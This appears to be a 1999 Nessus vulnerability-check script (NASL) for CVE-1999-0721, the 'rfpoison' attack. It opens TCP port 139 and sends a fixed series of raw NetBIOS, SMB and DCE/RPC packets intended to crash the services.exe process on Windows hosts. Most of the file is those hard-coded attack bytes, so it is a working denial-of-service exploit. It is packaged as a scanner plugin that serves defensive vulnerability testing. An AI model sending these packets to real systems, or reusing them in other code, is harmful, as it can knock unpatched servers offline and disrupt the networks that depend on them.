#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10204);
 script_cve_id("CVE-1999-0721");
 name["english"] = "rfpoison";
 name["francais"] = "rfpoison";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "It may be possible
to make the remote server crash
using the 'rfpoison' attack. 

A cracker may use this attack to
shut down this server, thus 
preventing your network from
working properly.

Solution : contact your operating
system vendor for a patch.

More information : http://www.wiretrip.net/rfp/p/doc.asp?id=23&iface=2
Risk factor : High";


 desc["francais"] = "Il peut  s'avrer
possible de faire planter la 
machine distante en utilisant
l'attaque 'rfpoison'. 

Un pirate peut utiliser cette
attaque pour empecher votre
rseau de fonctionner normallement.

Plus d'informations : http://www.wiretrip.net/rfp/p/doc.asp?id=23&iface=2
Solution : contactez le vendeur
de votre OS pour un patch.

Facteur de risque : Elev";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Crashes the remote host using the 'rfpoison' attack";
 summary["francais"] = "Plante le serveur distant en utilisant l'attaque 'rfpoison'";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"], francais:family["francais"]);

 script_require_ports(139);
 exit(0);
}

#
# The script code starts here
#


if(get_port_state(139))
{
 soc = open_sock_tcp(139);
 if(soc)
 {

#
# This is the result of rfp's secret program. I don't pretend
# I understand it, but it works.
#
 
data = raw_string(0x81,0x0,0x0,0x48,0x20,0x43,0x4b,0x46,0x44,0x45,0x4e,0x45,0x43,0x46,0x44,0x45,0x46,0x46,0x43,0x46,0x47,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x0,0x20,0x45,0x48,0x45,0x42,0x46,0x45,0x45,0x46,0x45,0x4c,0x45,0x46,0x45,0x46,0x46,0x41,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x0,0x0,0x0,0x0,0x0);
		    
send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x72,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0x0,0x81,0x0,0x2,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x31,0x2e,0x30,0x33,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x33,0x2e,0x30,0x0,0x2,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x0,0x2,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x0,0x2,0x53,0x61,0x6d,0x62,0x61,0x0,0x2,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x0,0x2,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0x54,0xff,0x53,0x4d,0x42,0x73,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0xd,0xff,0x0,0x0,0x0,0xff,0xff,0x2,0x0,0xf4,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x17,0x0,0x0,0x0,0x57,0x4f,0x52,0x4b,0x47,0x52,0x4f,0x55,0x50,0x0,0x55,0x6e,0x69,0x78,0x0,0x53,0x61,0x6d,0x62,0x61,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0x42,0xff,0x53,0x4d,0x42,0x75,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x8,0x1,0x0,0x4,0xff,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x17,0x0,0x0,0x5c,0x5c,0x2a,0x53,0x4d,0x42,0x53,0x45,0x52,0x56,0x45,0x52,0x5c,0x49,0x50,0x43,0x24,0x0,0x49,0x50,0x43,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x18,0xff,0x0,0x0,0x0,0x0,0x7,0x0,0x6,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x9f,0x1,0x2,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x3,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x0,0x8,0x0,0x5c,0x73,0x72,0x76,0x73,0x76,0x63,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0x94,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x48,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x48,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x51,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0xb,0x0,0x10,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x30,0x16,0x30,0x16,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0xc8,0x4f,0x32,0x4b,0x70,0x16,0xd3,0x1,0x12,0x78,0x5a,0x47,0xbf,0x6e,0xe1,0x88,0x3,0x0,0x0,0x0,0x4,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x8,0x0,0x2b,0x10,0x48,0x60,0x2,0x0,0x0,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x58,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x58,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x61,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0x0,0x3,0x10,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0xf,0x0,0x1,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x5c,0x0,0x5c,0x0,0x2a,0x0,0x53,0x0,0x4d,0x0,0x42,0x0,0x53,0x0,0x45,0x0,0x52,0x0,0x56,0x0,0x45,0x0,0x52,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

msg = "A 'rfpoison' packet has been sent to the remote host.
This packet is supposed to crash the 'services.exe' process,
rendering the system instable.
If you see that this attack was successful, have a look
at this page : 
   http://www.wiretrip.net/rfp/p/doc.asp?id=23&iface=2";

security_warning(port:139, data:msg);
close(soc);
}		    
